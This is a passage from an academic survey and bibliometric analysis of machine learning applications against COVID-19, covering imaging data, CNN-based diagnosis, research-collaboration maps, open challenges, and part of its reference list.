COVID-19 disease and related medical imaging concerns, summarized reviews on deep learning application to COVID-19 medical imaging analysis, and listed and described contributions to this domain. Finally, they discussed the challenges experienced in the research domain and made suggestions for future research. SURVEY AND BIBLIOMETRIC ANALYSIS Survey analysis In this survey, we review the projects that used machine learning to fight COVID-19 from a different perspective. We only considered published papers in reputable journals, and conferences, and no preprint papers uploaded in preprint server was used in the survey. We apprized 30 studies that reported the description of the machine learning approach to fighting COVID-19. We found that machine learning has made an inroad into fighting COVID-19 from a different aspect with potential for real-life applications to curtail the negative effect of COVID-19. Machine learning algorithms such as CNN, LSTM, and ANN that are utilized in fighting COVID-19 mostly reported excellent performance compared with the baseline approaches. Many of the studies complained about the scarcity of sufficient data to carry out large-scale study because of the novelty of the COVID-19 pandemic. We found that various studies used different COVID-19 data. Figure 4 depicts the type of data used in different studies that applied machine learning algorithm to develop different models for fighting COVID-19 pandemic. The data used to plot Fig. 4 were Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 25/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ extracted from machine learning research on COVID-19 (refer to Table 6). The longest bars show that X-rays and CT scans have the highest patronage from the studies. Many of the studies used deep learning algorithms, for example, CNN and LSTM, for the diagnosis of COVID-19 on X-rays and CT scans. The evaluation indicated the excellent performance of the algorithms in detecting COVID-19 on X-rays and CT scan images. The CT scan has a great value in the screening, diagnosis, and follow up of patients with COVID-19. The CT scan has now been added as a criterion for diagnosing of COVID-19 (Liu et al., 2020a; Li et al., 2020c). The X-rays with COVID-19 pandemic data project by Cohen hosted on GitHub is receiving unprecedented attention from the research community for accessing freely available data. Figure 5 presents the frequency of machine learning algorithms adopted to fight COVID-19. The longest bar indicates that CNN received the most considerable attention from the researchers working in this domain to fight COVID-19. The likely reason why CNN has the highest number of applications is that most of the data used in detecting COVID-19 infection in patients are images (see Fig. 4). CNN is well known for its robustness, effectiveness, and efficiency in image processing compared with other conventional machine learning algorithms because of its automated feature engineering and high performance. The CNN variant suitable for the diagnosis of COVID-19 from X-ray and CT scan images is ResNet. However, many of the studies did not provide the specific type of CNN adopted for the diagnosis of the COVID-19 from X-ray and CT scan images (see Table 3). Figure 6 shows the different aspects where machine learning algorithms were applied in fighting COVID-19. We found that the studies mainly adopted machine Figure 4 Visual representation of COVID-19 data extracted from different projects. Full-size DOI: 10.7717/peerj-cs.313/fig-4 Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 26/45 http://dx.doi.org/10.7717/peerj-cs.313/fig-4 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ learning algorithms in developing COVID-19 diagnosis tools, decision support system, drug development, and detection from protein sequence. The most extended portion of the pie chart indicates that diagnostic tools attracted the most considerable attention, showing the quest for diagnostic tools in the fight against COVID-19 pandemic because the match starts with a diagnosis before the appropriate treatment is administered to save a life, and incorrect diagnosis can lead to inappropriate medication, resulting in further health complications. Most of the studies that adopted machine learning to develop diagnostic tools intended to reduce the workload of radiologists, improve the speed of diagnosis, automate the COVID-19 diagnostic process, reduce the cost compared with traditional laboratory tests, and help healthcare workers in making critical decisions. The studies argued that the diagnostic tool could reduce the exposure of healthcare workers to patients with COVID-19, thus decreasing the risk of spreading COVID-19 to healthcare workers. The second part of the pie chart with the most substantial portion is the decision support system for detecting the rate of spread of the virus, confirmed cases, mortalities, and recovered cases. This information from the decision support system can help the government functionaries, policymakers, decision makers, and other stakeholders in formulating policy that can help fight COVID-19 pandemic. Figure 7 shows that the publications on the adoption of machine learning to fight COVID-19 started appearing in 2020 with no publications in 2019, although COVID-19 started appearing in late 2019. This situation is likely because a new virus-like the Figure 5 Machine learning algorithms adopted in fighting COVID-19. Full-size DOI: 10.7717/peerj-cs.313/fig-5 Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 27/45 http://dx.doi.org/10.7717/peerj-cs.313/fig-5 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Figure 6 Different aspect of machine learning applications in fighting COVID-19 pandemic. Full-size DOI: 10.7717/peerj-cs.313/fig-6 Figure 7 Trend of publications on machine learning applications in fighting COVID-19. Full-size DOI: 10.7717/peerj-cs.313/fig-7 Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 28/45 http://dx.doi.org/10.7717/peerj-cs.313/fig-6 http://dx.doi.org/10.7717/peerj-cs.313/fig-7 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ COVID-19 pandemic at the initial stage lacks data and has scant information and uncertainties. Bibliometric analysis The primary purpose of conducting a bibliometric analysis study in this study is to reflect the trend of rapidly emerging topics on COVID-19 research, where substantial research activity has already begun extensively during the early stage of the outbreak. Another significance of the bibliometric analysis method presented is to aid in the mapping of research situation on coronavirus disease as reported in several scientific works of literature by the research community. In this section, we present the bibliographic coupling among different article items on machine learning to fight COVID-19. The link between the items on the constructed map corresponds to the weight between them either in terms of the number of publications, common references, or co-citations. These items may belong to a group or a cluster. In the visualization, items within the same cluster are marked with the same color, and colors indicate the cluster to which a journal was assigned by the clustering technique implemented by the VOSviewer software. The circular node may represent the items, and their sizes may vary depending on the weight of the article. Prolific authors The bibliographic coupling between the top 25 authors is shown in Fig. 8. The two clusters, namely, red and green, correspond to all authors working on similar research fields “COVID-19” and citing the same source in their reference listings. The similarity in cluster color for the authors also implies that the degree of overlap between the reference lists of publications of these authors is higher. Figure 8 shows the visible names, and other names may not be represented in the constructed map. Figure 8 Bibliographic coupling among the authors. Two clusters, namely red (left) and green (right), correspond to all authors working on similar research fields “COVID-19” and citing the same sources in their reference listings. Full-size DOI: 10.7717/peerj-cs.313/fig-8 Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 29/45 http://dx.doi.org/10.7717/peerj-cs.313/fig-8 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Productive countries Figure 9 shows the bibliographic coupling of the topmost productive countries. Here, bibliographic coupling indicates that a common reference list in the articles published by these countries. The five clusters are represented by six colors. Red represents China and the USA with the highest strength in terms of contributions, after which comes India and Iran as the next countries within the red node. Green represents Hong Kong, which appears to have the highest strength, whereas blue is for the United Kingdom and Saudi Arabia that have the highest strength. Yellow denotes Japan, Singapore, Thailand, and Taiwan as the highest contributors. Purple refers to Italy and Canada as the two contributing countries. The link between the red and green clusters are thicker compared with that between the blue and red clusters, or between the blue and purple clusters. The thickness of the link simply depicts the degree of intersection of the literature work between the different locations or countries. Figure 9 Bibliographic coupling among the countries. Red represents China and the USA with the highest strength in terms of contributions, after which comes India and Iran as the next countries within the red node. Green represents Hong Kong, which appears to have the highest strength, whereas blue is for the United Kingdom and Saudi Arabia that have the highest strength. Yellow denotes Japan, Singapore, Thailand, and Taiwan as the highest contributors. Purple refers to Italy and Canada as the two contributing countries. Full-size DOI: 10.7717/peerj-cs.313/fig-9 Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 30/45 http://dx.doi.org/10.7717/peerj-cs.313/fig-9 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Collaborating institution Figure 10 shows the bibliographic coupling of the network of collaborating institutions that are affiliated with at least four documents on COVID-19 research. Map construction and analysis show that of the 949 institutions, 28 meet the thresholds of collaborating institutions, including the Guangzhou Center for Disease Control (or Chinese Center for Disease Control and Prevention), Huazhong University of Science and Technology, Wuhan University, Capital Medical University, Chinese Academy of Medical Sciences, University of Hong Kong, Sun Yat-Sen University, and Fudan University. Two clusters are identified by red and green colors. Institutions that fall under the same groups appear to have similar literature background or worked on related research fields. Journals Bibliographic coupling between journals implies that the papers published in these journals have more common reference lists. Three clusters are depicted on the map with red, blue, and green colors. The links with the highest strength occur between Emerging Microbes Journal, Journal of Virology, and Journal of Infection. This link is closely followed by the links between Eurosurveillance and Journal of Infection, Archive of Academic Emergency Medicine, Chinese Medical Journal, and The Lancet. The Journal of Infection Control and Hospital and Journal of Hospital Infection form the weakest networks of a cluster. Figure 11 illustrates the bibliographic coupling between the considered journals. Co-authorship and authors Figure 12 illustrates the co-authors and author map visualization. This analysis aims to produce the visualization of all the major authors publishing together or working on Figure 10 Bibliographic coupling among institutions. Two clusters, namely red (left) and green (right), correspond to all authors working on similar research fields “COVID-19” and citing the same sources in their reference listings. Full-size DOI: 10.7717/peerj-cs.313/fig-10 Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 31/45 http://dx.doi.org/10.7717/peerj-cs.313/fig-10 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ similar research fields. The analysis type is co-authorship, and the unit of analysis is authors. The threshold of the minimum number of articles by an author is 25. Network construction and analysis shows that of 2,381 authors, only nine authors meet the limits. However, the most extensive set of connected entities consists of only eight authors, whose visual representation is depicted in Fig. 12, where only one cluster is denoted by red color. The connected link illustrates that these authors have collaborated on the same project or worked on the same research with a similar focus. The thickness of the link between these three authors indicates more common publications. Figure 12 Co-authorship and authors’ analysis. The four main clusters, namely, blue (right), red (bottom-centre), green (top-centre), pink (left) match all the major co-authors and authors publishing together or working on similar research fields. Full-size DOI: 10.7717/peerj-cs.313/fig-12 Figure 11 Bibliographic coupling among the journals. Three clusters are depicted on the map with red (left), blue (bottom-centre), and green (right) colors. Each cluster shows COVID-19 published papers with more common reference lists among the associated journals. Full-size DOI: 10.7717/peerj-cs.313/fig-11 Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 32/45 http://dx.doi.org/10.7717/peerj-cs.313/fig-12 http://dx.doi.org/10.7717/peerj-cs.313/fig-11 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Impact analysis Figure 13 illustrates the citation analysis among authors’ institutions. Six clusters are represented using different colors. The red cluster has the highest number of author citations from two institutions, namely, the Huazhong University of Science and Technology, Wuhan University (State Key Laboratory of Virology), and the Department of Microbiology, University of Hong Kong. Figure 14 shows the bibliometric analyses of Figure 14 Author citation by journal source. Three major clusters, namely, red (left), lemon-green (top-right), and green (bottom-left) were identified in the analysis, as the top-cited journal sources as per author publications. Full-size DOI: 10.7717/peerj-cs.313/fig-14 Figure 13 Author citation by institution. Six clusters are represented using different colors to denotes authors citation counts per institution, for which only the red (bottom-left) cluster has the highest number of author citations from two institutions in China. Full-size DOI: 10.7717/peerj-cs.313/fig-13 Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 33/45 http://dx.doi.org/10.7717/peerj-cs.313/fig-14 http://dx.doi.org/10.7717/peerj-cs.313/fig-13 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ author citations by journal sources. A link between two journal sources indicates the citation connectivity between the two sources. The connected links between the Journal of Virology and the New England Journal of Medicine in Fig. 14 reveal that a publication from the Journal of Virology has cited another publication that is published in the New England Journal of Medicine or vice versa. The thickness and link strength signify more numbers of citation among the clusters. Therefore, among the different clusters identified in the analysis, the Journal of Virology is the top-cited source by publication from other journal sources. CHALLENGES AND FUTURE RESEARCH OPPORTUNITIES In this section, we present challenges and future research prospects. More so, Fig. 15 describes the course of conducting the literature survey and opportunities for future research with the possibility of solving the challenges to help expert researchers easily identify areas that need development. The challenges and future research opportunities are presented as follows: Lack of sufficient COVID-19 data: The primary concern with the research in COVID-19 is the barrier prompted by the lack of adequate COVID-19 clinical data (Alimadadi et al., 2020; Mei et al., 2020; Ayyoubzadeh et al., 2020; Fong et al., 2020; Oh, Park & Ye, 2020; Toğaçar, Ergen & Cömert, 2020; Ucar & Korkmaz, 2020; Belfiore et al., 2020). However, an in-depth analysis of patients with COVID-19 requires much more data (Apostolopoulos & Figure 15 Visual representation of the challenges. Full-size DOI: 10.7717/peerj-cs.313/fig-15 Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 34/45 http://dx.doi.org/10.7717/peerj-cs.313/fig-15 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Mpesiana, 2020). Data is the key component in machine learning. Machine learning approaches typically experience a limitation in their efficiency and effectiveness in solving machine learning problems without sufficient data. Therefore, insufficient COVID-19 clinical data can limit the performance of specific machine learning algorithms, such as deep learning algorithms that require large-scale data. In this case, developing machine- learning-based COVID-19 diagnostic and prognosis tools, and therapeutic approaches to curtail COVID-19, and predicting a future pandemic can face a severe challenge in terms of performance due to insufficient COVID-19 clinical data. Alimadadi et al. (2020) suggested global collaborations among stakeholders to build COVID-19 clinical database and mitigate the issue of inadequate COVID-19 clinical data. Existing biobanks containing the data of patients with COVID-19 are integrated with COVID-19 clinical data. We suggest that researchers use GAN to generate additional X-rays and CT scan images for COVID-19 to obtain sufficient data for building COVID-19 diagnosis tools. For example, Loey, Smarandache & Khalifa (2020) were motivated by insufficient data and used GAN to generate more X-ray images and develop a COVID-19 diagnostic tool. Visualization from X-rays and CT Scan: Figure 4 shows that X-ray and CT scan are the two primary clinical data for detecting COVID-19 infection in patients. Distinguishing patients with COVID-19 and mild symptoms from pneumonia on X-ray images could be visualized inaccurately or cannot be visualized totally (Apostolopoulos & Mpesiana, 2020). We suggest that researchers propose machine learning strategies that can accurately differentiate patients with COVID-19 and mild symptoms from patients with pneumonia symptoms based on X-ray images. COVID-19 that is caused by coronavirus might have a CT scan image characteristic similar to other pneumonia caused by a different virus. In the future, the performance of CNN should be evaluated in classifying COVID-19 and viral pneumonia with RT–PCR (Li et al., 2020b). Uncertainties: When a new pandemic breaks out, it comes with limited information and very high uncertainly, unlike the commonly known influenza. Therefore, knowledge regarding the new epidemic is not sufficient due to the absence of a prior case that is the same as the recent pandemic. In the case of COVID-19, many of the decision makers relied on SARS for reference because of the similarity, even though it is considerably different from COVID-19. The new pandemic typically poses a challenge to data analytics, considering its limited information and geographical and temporal evolving of the recent epidemic. Therefore, an accurate model for predicting the future behavior of a pandemic becomes challenging due to uncertainty (Fong et al., 2020). We suggest that researchers propose a new pandemic forecasting model based on active learning in machine learning to reduce the level of uncertainty, typically accompanying new pandemics such as COVID-19. Non-uniform pattern: Liu et al. (2020a) applied Susceptible, Exposed, Infectious, Recovered (SEIR) for modeling COVID-19. However, the SEIR model could not capture the complete number of infected cases, while the study ignored imported COVID-19 confirmed cases. SEIR was based on the people’s natural distribution and cannot apply to welfare institute an example of different population distribution. The epidemiological Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 35/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ trend of COVID-19 was not predicted accurately by the SEIR model under the viral mutation and specific ant-viral therapy development scenario. The SEIR model was unable to simulate non-uniform patterns, such as the issue of increasing medical professionals and bed capacity (Liu et al., 2020a). We suggest that researchers propose a machine- learning-based strategy for handling the non-uniform pattern in the future and consider all the other factors not considered in the study. Insufficient regional data: Adequate COVID-19 data for a particular region are lacking because the capacity to gather reliable data is not uniform across regions worldwide. This situation can bring a challenge to the region without available COVID-19 data. We suggest that researchers apply the cross-population train–test model because a model trained in a different region can be used to detect COVID-19 in a different region. For example, the model trained to detect the new virus in Wuhan, China, can be used in Italy (Santosh, 2020). Image resolution: The resolution of the X-ray images affects the performance of the machine learning algorithm. Dealing with low-resolution images typically poses a challenge to the machine learning approach. Variable size of the resolution dimension has a negative effect. Successful performance cannot be achieved if the input images of the data have different sizes. The original image resolution dimension, structured images, and stacking technique need to be the same (Toğaçar, Ergen & Cömert, 2020). We suggest high-resolution X-ray images for developing COVID-19 diagnostic and prognosis system with the ability to work with low-resolution X-ray images. Outliers and noise: At the early phase of COVID-19, the COVID-19 data contained many outliers and much noise (Tuli et al., 2020). An outlier in data is a subset of the data that appears with inconsistencies from the remaining data. Outliers typically lower the fit of a statistical model (Bellazzi, Guglielmann & Ironi, 1998). The presence of outliers and noise in COVID-19 makes predicting the correct number of COVID-19 cases challenging (Tuli et al., 2020). Dealing with outliers and noise in data increases data engineering efforts and expenses. We suggest that researchers propose a robust machine learning approach that can effectively handle outliers and noise in COVID-19 data. Transparency and interpretability: The limitation of deep learning algorithms is a deficiency in terms of transparency and interpretability. For instance, knowing the image features that are applied to decide the output of the deep learning algorithms is not possible. The unique features used by the deep learning algorithm to differentiate COVID-19 from CAP cannot be sufficiently visualized by the heatmap, although the heatmap is used to visualize region in images that led to the algorithm output (Li et al., 2020b). Images, especially X-rays and CT scans, are heavily relied on in detecting COVID-19. We suggest that researchers propose explainable deep learning algorithms for the detection of COVID-19 to instill transparency and interpretation in deep learning algorithms. Misdiagnosis: The application of a deep learning algorithm to detect COVID-19 on a chest CT scan has the possibility of misdiagnosis (Wu et al., 2020) because of the similarity of the COVID-19 symptoms with other types of pneumonia (Belfiore et al., 2020). Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 36/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Incorrect diagnoses can mislead the health professional in deciding and lead to inappropriate medication, further complicating the health condition of the patient with COVID-19. We suggest that researchers combine the CT scan diagnosis using deep learning algorithm with clinical information such as the nucleic acid detection results, clinical symptoms, epidemiology, and laboratory indicators to avoid misdiagnosis (Wu et al., 2020). Resource allocation: Resource allocation is a challenge as the COVID-19 pandemic keeps spreading because the increase in the number of patients means more resources are required to take care of them. The allocation of limited resources in a rapidly expanding pandemic entails a difficult decision for the distribution of scarce resources (Jiang et al., 2020). The epicenters of the COVID-19 are challenged with resource problems of shortage of beds, gowns, masks, medical staff, and ventilators (Ahuja, Reddy & Marques, 2020). We propose the development of a machine learning decision support system to help in crucial decisions on resource allocation. CONCLUSIONS In this study, we propose a survey, including a bibliometric analysis of the adoption of machine learning, to fight COVID-19. The concise summary of the projects that adopted machine learning to fight COVID-19, sources of COVID-19 datasets, new comprehensive taxonomy, synthesis and analysis, and bibliometric analysis is presented. The results reveal that COVID-19 diagnostic tools received the most considerable attention from researchers, and energy and resources are more dispensed toward automated COVID-19 diagnostic tools. By contrast, COVID-19 drugs and vaccine development remain grossly underexploited. The algorithm predominantly utilized by the researchers in developing the diagnostic tool is CNN mainly from X-rays and CT scan images. The most suitable CNN architecture for the detection of COVID-19 from the X-ray and CT scan images is ResNet. The challenges hindering practical work on machine learning to fight COVID-19 and a new perspective to solve the identified problems are presented in the study. We believe that our survey with bibliometric analysis could enable researchers to determine areas that need further development and identify potential collaborators at author, country, and institutional levels. Based on the bibliometric analysis conducted on the global scientific research output on COVID-19 disease spread and preventive measures, the analysis results reveal that most of the research outputs were published in prestigious journals with high influence factors. These journals include The Lancet, Journal of Medical Virology, and Eurosurveillance. The bibliometric analysis also shows the focused subjects in various aspects of COVID-19 infection transmission, diagnosis, treatment, prevention, and its complications. Other prominent features include strong collaboration among research institutions, universities, and co-authorships among researchers across the globe. Machine learning algorithms have many practical applications in medicine, and novel contributions from different researchers are still evolving and growing exponentially in a bid to satisfy the essential clinical needs of the individual patients, as it is the case with its application to fighting the COVID-19 pandemic. As a way forward, we suggest an Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 37/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ in-depth machine learning application review that would focus on the critical analysis of the novel coronavirus disease and other related cases of global pandemics. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Haruna Chiroma conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Absalom E. Ezugwu conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Fatsuma Jauro performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Mohammed A. Al-Garadi performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Idris N. Abdullahi performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Liyana Shuib performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: All raw data are contained in the Methodology and in Table 1. REFERENCES Ahuja AS, Reddy VP, Marques O. 2020. Artificial intelligence and COVID-19: a multidisciplinary approach. Integrative Medicine Research 9(3):100434 DOI 10.1016/j.imr.2020.100434. Ai T, Yang Z, Hou H, Zhan C, Chen C, Lv W, Tao Q, Sun Z, Xia L. 2020. Correlation of chest CT and RT-PCR testing in coronavirus disease 2019 (COVID-19) in China: a report of 1014 cases. Radiology 200642(2):E32–E40 DOI 10.1148/radiol.2020200642. Alimadadi A, Aryal S, Manandhar I, Munroe PB, Joe B, Cheng X. 2020. Artificial intelligence and machine learning to fight COVID-19. Physiological Genomics 52(4):200–202 DOI 10.1152/physiolgenomics.00029.2020. Apostolopoulos ID, Mpesiana TA. 2020. Covid-19: automatic detection from x-ray images utilizing transfer learning with convolutional neural networks. Physical and Engineering Sciences in Medicine 43:635–640 DOI 10.1007/s13246-020-00865-4. Ardakani AA, Kanafi AR, Acharya UR, Khadem N, Mohammadi A. 2020. Application of deep learning technique to manage COVID-19 in routine clinical practice using CT images: results of Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 38/45 http://dx.doi.org/10.1016/j.imr.2020.100434 http://dx.doi.org/10.1148/radiol.2020200642 http://dx.doi.org/10.1152/physiolgenomics.00029.2020 http://dx.doi.org/10.1007/s13246-020-00865-4 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ 10 convolutional neural networks. Computers in Biology and Medicine 121:103795 DOI 10.1016/j.compbiomed.2020.103795. Asif S, Wenhui Y. 2020. Automatic detection of COVID-19 using X-ray images with deep convolutional neural networks and machine learning. Computers in Biology and Medicine 121:103792 DOI 10.1016/j.compbiomed.2020.103792. Ayyoubzadeh SM, Ayyoubzadeh SM, Zahedi H, Ahmadi M, Kalhori SRN. 2020. Predicting COVID-19 incidence through analysis of google trends data in iran: data mining and deep learning pilot study. JMIR Public Health and Surveillance 6(2):e18828 DOI 10.2196/18828. Barbosa RDM, Fernandes MA. 2020. Chaos game representation dataset of SARS-CoV-2 genome. Data in Brief 30:105618 DOI 10.1016/j.dib.2020.105618. Basheer IA, Hajmeer M. 2000. Artificial neural networks: fundamentals, computing, design, and application. Journal of Microbiological Methods 43(1):3–31. Belfiore MP, Urraro F, Grassi R, Giacobbe G, Patelli G, Cappabianca S, Reginelli A. 2020. Artificial intelligence to codify lung CT in Covid-19 patients. In: Giovagnoni A, ed. La radiologia medica. Berlin: Springer, 1–5. Bellazzi R, Guglielmann R, Ironi L. 1998. Qualitative and fuzzy reasoning for identifying non-linear physiological systems: an application to intracellular thiamine kinetics. In: 5th International Workshop on Intelligent Data Analysis in Medicine and Pharmacology. Bernheim A, Mei X, Huang M, Yang Y, Fayad ZA, Zhang N, Diao K, Lin B, Zhu X, Li K, Li S, Shan H, Jacobi A, Chung M. 2020. Chest CT findings in coronavirus disease-19 (COVID-19): relationship to duration of infection. Radiology 295(3):200463 DOI 10.1148/radiol.2020200463. Butt C, Gill J, Chun D, Babu BA. 2020. Deep learning system to screen coronavirus disease 2019 pneumonia. Applied Intelligence Epub ahead of print 22 April 2020 DOI 10.1007/s10489-020-01714-3. Casey B. 2020. How good is radiography for COVID-19 detection? Available at AuntMinnie.com. Chahrour M, Assi S, Bejjani M, Nasrallah AA, Salhab H, Fares M, Khachfe HH. 2020. A bibliometric analysis of Covid-19 research activity: a call for increased output. Cureus 12(3):e7357. Chimmula VKR, Zhang L. 2020. Time series forecasting of covid-19 transmission in canada using lstm networks. Chaos, Solitons & Fractals 135:109864. Corman VM, Landt O, Kaiser M, Molenkamp R, Meijer A, Chu DK, Bleicker T, Brünink S, Schneider J, Schmidt ML, Mulders DG, Haagmans BL, Van der Veer B, Van den Brink S, Wijsman L, Goderski G, Romette J-L, Ellis J, Zambon M, Peiris M, Goossens H, Reusken C, Koopmans MP, Drosten C. 2020. Detection of 2019 novel coronavirus (2019-nCoV) by real-time RT-PCR. Euro Surveillance 25(3):2000045. Dananjayan S, Raj GM. 2020. Artificial intelligence during a pandemic: the COVID-19 example. International Journal of Health Planning and Management 35(5):1260–1262 DOI 10.1002/hpm.2987. Das KM, Lee EY, Singh R, Enani MA, Al Dossari K, Van Gorkom K, Larsson SG, Langer RD. 2017. Follow-up chest radiographic findings in patients with MERS-CoV after recovery. Indian Journal of Radiology and Imaging 27(3):342 DOI 10.4103/ijri.IJRI_469_16. Deng L. 2014. A tutorial survey of architectures, algorithms, and applications for deep learning. APSIPA Transactions on Signal and Information Processing 3:1–29. Dong D, Tang Z, Wang S, Hui H, Gong L, Lu Y, Xue Z, Liao H, Chen F, Yang F, Jin R, Wang K, Liu Z, Wei J, Mu W, Zhang H, Jiang J, Tian J, Li H. 2020. The role of imaging in the detection Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 39/45 http://dx.doi.org/10.1016/j.compbiomed.2020.103795 http://dx.doi.org/10.1016/j.compbiomed.2020.103792 http://dx.doi.org/10.2196/18828 http://dx.doi.org/10.1016/j.dib.2020.105618 http://dx.doi.org/10.1148/radiol.2020200463 http://dx.doi.org/10.1007/s10489-020-01714-3 AuntMinnie.com http://dx.doi.org/10.1002/hpm.2987 http://dx.doi.org/10.4103/ijri.IJRI_469_16 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ and management of COVID-19: a review. IEEE Reviews in Biomedical Engineering Epub ahead of print 27 April 2020 DOI 10.1109/RBME.2020.2990959. Duan YN, Qin J. 2020. Pre-and posttreatment chest CT findings: 2019 novel coronavirus (2019-nCoV) pneumonia. Radiology 295(1):21 DOI 10.1148/radiol.2020200323. Elavarasan RM, Pugazhendhi R. 2020. Restructured society and environment: a review on potential technological strategies to control the COVID-19 pandemic. Science of the Total Environment 725:138858 DOI 10.1016/j.scitotenv.2020.138858. Fang Y, Zhang H, Xie J, Lin M, Ying L, Pang P, Ji W. 2020. Sensitivity of chest CT for COVID-19: comparison to RT-PCR. Radiology 200432(2):E115–E117 DOI 10.1148/radiol.2020200432. Farhat H, Sakr GE, Kilany R. 2020. Deep learning applications in pulmonary medical imaging: recent updates and insights on COVID-19. Machine Vision and Applications 31(6):1–42 DOI 10.1007/s00138-020-01101-5. Fong SJ, Li G, Dey N, Crespo RG, Herrera-Viedma E. 2020. Composite Monte Carlo decision making under high uncertainty of novel coronavirus epidemic using hybridized deep learning and fuzzy rule induction. Applied Soft Computing 93:106282. Gonzalez-Dias P, Lee EK, Sorgi S, De Lima DS, Urbanski AH, Silveira EL, Nakaya HI. 2020. Methods for predicting vaccine immunogenicity and reactogenicity. Human Vaccines & Immunotherapeutics 16(2):269–276 DOI 10.1080/21645515.2019.1697110. Gorbalenya AE. 2020. Severe acute respiratory syndrome-related coronavirus: the species and its viruses, a statement of the coronavirus study group. BioRxiv DOI 10.1101/2020.02.07.937862. Greff K, Srivastava RK, Koutn J, Steunebrink BR, Schmidhuber J. 2016. LSTM: a search space odyssey. IEEE Transactions on Neural Networks and Learning Systems 28(10):2222–2232 DOI 10.1109/TNNLS.2016.2582924. Guan WJ, Ni ZY, Hu Y, Liang WH, Ou CQ, He JX, Liu L, Shan H, Lie L, Hui DSC, Du B, Li L, Zeng G, Yuen KY, Chen RC, Tang CL, Wang T, Chen PY, Xiang J, Li SY, Wang JL, Liang ZL, Peng YX, Wei L, Liu Y, Hu Y, Peng P, Wang JM, Liu JY, Chen Z, Li G, Zheng ZJ, Qui SQ, Luo J, Ye CY, Zhu SY, Zhong NS. 2020. Clinical characteristics of coronavirus disease 2019 in China. New England Journal of Medicine 382(18):1708–1720 DOI 10.1056/NEJMoa2002032. Haque IRI, Neubert J. 2020. Deep learning approaches to biomedical image segmentation. Informatics in Medicine Unlocked 18:100297 DOI 10.1016/j.imu.2020.100297. Holshue ML, DeBolt C, Lindquist S, Lofy KH, Wiesman J, Bruce H, Spitters C, Ericson K, Wilkerson S, Tural A, Diaz G, Cohn A, Fox LA, Patel A, Gerber SI, Kim L, Tong S, Lu X, Lindstrom S, Pallansch MA, Weldon WC, Biggs HM, Uyeki TM, Pillai SK. 2020. First case of 2019 novel coronavirus in the United States. New England Journal of Medicine 382(10):929–936 DOI 10.1056/NEJMoa2001191. Hossain MM. 2020. Current status of global research on novel coronavirus disease (Covid-19): A bibliometric analysis and knowledge mapping. F1000Research 9:374 DOI 10.12688/f1000research.23690.1. Hu S, Gao Y, Niu Z, Jiang Y, Li L, Xiao X, Wang M, Fang EF, Menpes-Smith W, Xia J, Ye H, Yang G. 2020. Weakly supervised deep learning for covid-19 infection detection and classification from ct images. IEEE Access 8:118869–118883 DOI 10.1109/ACCESS.2020.3005510. Huang C, Wang Y, Li X, Ren L, Zhao J, Hu Y, Zhang L, Fan G, Xu J, Gu X, Cheng Z, Yu T, Xia J, Wei Y, Wu W, Xie X, Yin W, Li H, Liu M, Xiao Y, Gao H, Guo L, Xie J, Wang G, Jiang R, Gao Z, Jin Q, Wang J, Cao B. 2020a. Clinical features of patients infected with 2019 novel coronavirus in Wuhan, China. Lancet 395(10223):497–506 DOI 10.1016/S0140-6736(20)30183-5. Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 40/45 http://dx.doi.org/10.1109/RBME.2020.2990959 http://dx.doi.org/10.1148/radiol.2020200323 http://dx.doi.org/10.1016/j.scitotenv.2020.138858 http://dx.doi.org/10.1148/radiol.2020200432 http://dx.doi.org/10.1007/s00138-020-01101-5 http://dx.doi.org/10.1080/21645515.2019.1697110 http://dx.doi.org/10.1101/2020.02.07.937862 http://dx.doi.org/10.1109/TNNLS.2016.2582924 http://dx.doi.org/10.1056/NEJMoa2002032 